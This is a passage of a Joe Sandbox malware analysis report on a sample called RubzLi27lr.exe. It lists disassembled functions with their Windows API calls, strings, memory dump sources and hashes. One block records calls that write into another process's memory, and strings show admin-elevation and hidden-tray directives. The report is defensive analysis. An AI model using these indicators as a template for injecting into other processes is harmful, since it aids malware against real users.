                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2962429428-0
                                                                                                                  • Opcode ID: 110daa32bd344c99afee9af2585a962280f8a20569ac3d163ef321c486747c0b
                                                                                                                  • Instruction ID: dafc285a2cc8428af94cfbdf52ba056c47cabdc7f0f4d2d37881d2a644abac1e
                                                                                                                  • Opcode Fuzzy Hash: 110daa32bd344c99afee9af2585a962280f8a20569ac3d163ef321c486747c0b
                                                                                                                  • Instruction Fuzzy Hash: 8F01A272811B259FC730AF66E880412FBF5FF543153158A7FD19A52932C771A954CF84
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AED752
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AED764
                                                                                                                  • _free.LIBCMT ref: 00AED776
                                                                                                                  • _free.LIBCMT ref: 00AED788
                                                                                                                  • _free.LIBCMT ref: 00AED79A
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: ebb26d7629a4e3902baf9b9c9ba8e54c23a91bee16b29b3242297f88f1631c23
                                                                                                                  • Instruction ID: d5b7dd3a6c1991287971cd2e9d03d9cf31bad7f35cfdc694d0990d5a2a24cf71
                                                                                                                  • Opcode Fuzzy Hash: ebb26d7629a4e3902baf9b9c9ba8e54c23a91bee16b29b3242297f88f1631c23
                                                                                                                  • Instruction Fuzzy Hash: C7F03032544288AB8661FB6AFAC6D1A7BDDBB84710BA51C0DF05CE7502CB34FCC08B64
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15C58
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B15C6F
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00B15C87
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00B15CA3
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00B15CBD
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: a9045ce6609e2413c93dcf0860884fd491225be009de745a604f7f88012cbe1c
                                                                                                                  • Instruction ID: bf9f989c45714d20be75a50b122501b61ff63dc466adb482f1884fa623220545
                                                                                                                  • Opcode Fuzzy Hash: a9045ce6609e2413c93dcf0860884fd491225be009de745a604f7f88012cbe1c
                                                                                                                  • Instruction Fuzzy Hash: 74018634501B04EBEB305F10DD4EFE67BF8FB41B05F411599A693A20E1DFF4AA848A90
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00AE22BE
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AE22D0
                                                                                                                  • _free.LIBCMT ref: 00AE22E3
                                                                                                                  • _free.LIBCMT ref: 00AE22F4
                                                                                                                  • _free.LIBCMT ref: 00AE2305
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: fa6485b4ffb0b9230f02cd6653c4ff74a90df7bd8d0185ed4f4699d3d145c84a
                                                                                                                  • Instruction ID: 4e784eaa98fe1a4f70bffa7b6ee8ea931e24f7246ddc0262614cf551a527ffb2
                                                                                                                  • Opcode Fuzzy Hash: fa6485b4ffb0b9230f02cd6653c4ff74a90df7bd8d0185ed4f4699d3d145c84a
                                                                                                                  • Instruction Fuzzy Hash: ECF05EB18111648B8622BF59BD02A583FACFB687A0702590EF524D72B2CF340852EFE5
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00AC95D4
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00B071F7,00000000,?,?,?), ref: 00AC95F0
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00AC9603
                                                                                                                  • DeleteObject.GDI32 ref: 00AC9616
                                                                                                                  • StrokePath.GDI32(?), ref: 00AC9631
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 83970f9637d58eb8ff661f6890fc06be884c908b117e4f54beb128c7376b2b49
                                                                                                                  • Instruction ID: 14026db961608856805fc6c1bf6b69a5d5734094739d160afb4248d898d3dfd7
                                                                                                                  • Opcode Fuzzy Hash: 83970f9637d58eb8ff661f6890fc06be884c908b117e4f54beb128c7376b2b49
                                                                                                                  • Instruction Fuzzy Hash: E7F0F234007608EBDB265F69ED1CB653F69BB02722F058618E425661F1CF308A97DF20
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$_free
                                                                                                                  • String ID: a/p$am/pm
                                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                                  • Opcode ID: e03e62e5ab3b1e2df877c80db69ccde649a03e362aa92927ea5ffa69162c0487
                                                                                                                  • Instruction ID: c092b8da64ac7ac3a1e81ab6d36b29135472b8cd2472d576faeee8c1d713d1ab
                                                                                                                  • Opcode Fuzzy Hash: e03e62e5ab3b1e2df877c80db69ccde649a03e362aa92927ea5ffa69162c0487
                                                                                                                  • Instruction Fuzzy Hash: 23D115719002E6CADB649F6AC895BFEB7B1FF05300F284269EA01AF654D3759D80CB91
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AD0242: EnterCriticalSection.KERNEL32(00B8070C,00B81884,?,?,00AC198B,00B82518,?,?,?,00AB12F9,00000000), ref: 00AD024D
                                                                                                                    • Part of subcall function 00AD0242: LeaveCriticalSection.KERNEL32(00B8070C,?,00AC198B,00B82518,?,?,?,00AB12F9,00000000), ref: 00AD028A
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00AD00A3: __onexit.LIBCMT ref: 00AD00A9
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00B37BFB
                                                                                                                    • Part of subcall function 00AD01F8: EnterCriticalSection.KERNEL32(00B8070C,?,?,00AC8747,00B82514), ref: 00AD0202
                                                                                                                    • Part of subcall function 00AD01F8: LeaveCriticalSection.KERNEL32(00B8070C,?,00AC8747,00B82514), ref: 00AD0235
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                  • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                  • API String ID: 535116098-3733170431
                                                                                                                  • Opcode ID: df47930211e526cd8204183dbeaf11a2ca92d67369e0239e60340ad75b54e380
                                                                                                                  • Instruction ID: 2edaa5bedcc7a45369970e32bf71014c5cd00f0cfb02e1c943161f860950d215
                                                                                                                  • Opcode Fuzzy Hash: df47930211e526cd8204183dbeaf11a2ca92d67369e0239e60340ad75b54e380
                                                                                                                  • Instruction Fuzzy Hash: EB918CB4A44209EFCB24EF94D991DADB7F5FF45700F608099F8069B2A2DB31AE41CB51
APIs
  • Part of subcall function 00B1B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B121D0,?,?,00000034,00000800,?,00000034), ref: 00B1B42D
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B12760
  • Part of subcall function 00B1B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B1B3F8
  • Part of subcall function 00B1B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B1B355
  • Part of subcall function 00B1B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B12194,00000034,?,?,00001004,00000000,00000000), ref: 00B1B365
  • Part of subcall function 00B1B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B12194,00000034,?,?,00001004,00000000,00000000), ref: 00B1B37B
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B127CD
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B1281A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RubzLi27lr.exe,00000104), ref: 00AE1769
• _free.LIBCMT ref: 00AE1834
• _free.LIBCMT ref: 00AE183E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\RubzLi27lr.exe
• API String ID: 2506810119-3827172066
APIs
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B1C306
• DeleteMenu.USER32(?,00000007,00000000), ref: 00B1C34C
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B81990,017E4C38), ref: 00B1C395
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B4CC08,00000000,?,?,?,?), ref: 00B444AA
• GetWindowLongW.USER32 ref: 00B444C7
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B444D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
APIs
  • Part of subcall function 00B3335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B33077,?,?), ref: 00B33378
• inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
• _wcslen.LIBCMT ref: 00B3309B
• htons.WSOCK32(00000000,?,?,00000000), ref: 00B33106
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: ByteCharMultiWide_wcslenhtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 946324512-2422070025
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B43F40
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B43F54
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00B43F78
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B44705
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B44713
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B4471A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _wcslen
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 176396367-2734436370
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B43840
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B43850
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B43876
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: 9636d3f2d0dc8bdabaa767504559fcb4fc30e576adb415319367a4da44fe1ef3
                                                                                                                  • Instruction ID: 5c66296ad1f5d86c42130d4426b97107d7d5a81cbfcdf29417443105e949252e
                                                                                                                  • Opcode Fuzzy Hash: 9636d3f2d0dc8bdabaa767504559fcb4fc30e576adb415319367a4da44fe1ef3
                                                                                                                  • Instruction Fuzzy Hash: 7621D472600118BBEF118F54CC81FBB3BEEEF89B50F148154F9449B190CA71DE5297A0
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B24A08
                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B24A5C
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B4CC08), ref: 00B24AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                                  • String ID: %lu
                                                                                                                  • API String ID: 2507767853-685833217
                                                                                                                  • Opcode ID: 527a0a646a409fdd237f731344478bef7e836de8bdf22e09d3fa44a7b3aaa431
                                                                                                                  • Instruction ID: ef3e1ac42cd677ed683d89904133f6c2a4413189b11a482983498aa963a149ca
                                                                                                                  • Opcode Fuzzy Hash: 527a0a646a409fdd237f731344478bef7e836de8bdf22e09d3fa44a7b3aaa431
                                                                                                                  • Instruction Fuzzy Hash: 4A316275A00119AFDB10DF54C985EAE7BF8EF09308F1480A9F909DB262DB71EE45CB61
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B4424F
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B44264
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B44271
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: 78b5c4aa044005056e7d24b226a39202d6662b80f26b3e119b98721df45df2b8
                                                                                                                  • Instruction ID: b23e7df56e22950e04573a706885e3936338b5333e29675423fd592eebd809db
                                                                                                                  • Opcode Fuzzy Hash: 78b5c4aa044005056e7d24b226a39202d6662b80f26b3e119b98721df45df2b8
                                                                                                                  • Instruction Fuzzy Hash: 1B11E331250208BEEF205E29CC06FAB3BECEF95B54F014524FA55E60A0D6B1DC21AB10
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                    • Part of subcall function 00B12DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B12DC5
                                                                                                                    • Part of subcall function 00B12DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B12DD6
                                                                                                                    • Part of subcall function 00B12DA7: GetCurrentThreadId.KERNEL32 ref: 00B12DDD
                                                                                                                    • Part of subcall function 00B12DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B12DE4
                                                                                                                  • GetFocus.USER32 ref: 00B12F78
                                                                                                                    • Part of subcall function 00B12DEE: GetParent.USER32(00000000), ref: 00B12DF9
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B12FC3
                                                                                                                  • EnumChildWindows.USER32(?,00B1303B), ref: 00B12FEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                  • String ID: %s%d
                                                                                                                  • API String ID: 1272988791-1110647743
                                                                                                                  • Opcode ID: 4c97085ee1a57384d243d59825fc190ba43a30b8d52531559053fb6c2f2e9683
                                                                                                                  • Instruction ID: 8c081fcd4fdf696d6d9a571c8cfb8733bc7983c01a3c5a9289bab71efbd1e70a
                                                                                                                  • Opcode Fuzzy Hash: 4c97085ee1a57384d243d59825fc190ba43a30b8d52531559053fb6c2f2e9683
                                                                                                                  • Instruction Fuzzy Hash: 4411C0752002056BDF556F60DC99FED37EAAF88704F4480B5B9099B152EE309A858B70
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B458C1
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B458EE
                                                                                                                  • DrawMenuBar.USER32(?), ref: 00B458FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$InfoItem$Draw
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3227129158-4108050209
                                                                                                                  • Opcode ID: 4c1b03079adf82d09828998d10eeb071fa5cc17170e0e839c50ee7fe166fefad
                                                                                                                  • Instruction ID: 8fd58a88f3ebabfe09fc27157a84ebd09633947603c53f2d81508a2953381790
                                                                                                                  • Opcode Fuzzy Hash: 4c1b03079adf82d09828998d10eeb071fa5cc17170e0e839c50ee7fe166fefad
                                                                                                                  • Instruction Fuzzy Hash: 55016D31501618EFDB619F11DC85BAEBBB5FB45760F1080D9E849DA252DB308B84EF31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4682f6f39e84e239b6a2b53a5486de3449a39612ecb3fb66099d2d6dbd3a902
                                                                                                                  • Instruction ID: 5820dcb877ba0103961f5373c366c962c62556d0b320c26d1d841eb350bceca2
                                                                                                                  • Opcode Fuzzy Hash: b4682f6f39e84e239b6a2b53a5486de3449a39612ecb3fb66099d2d6dbd3a902
                                                                                                                  • Instruction Fuzzy Hash: ECC16875A1020AEFCB14DFA4C898AAEB7B5FF48704F608598E515EB251C770EEC1CB90
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
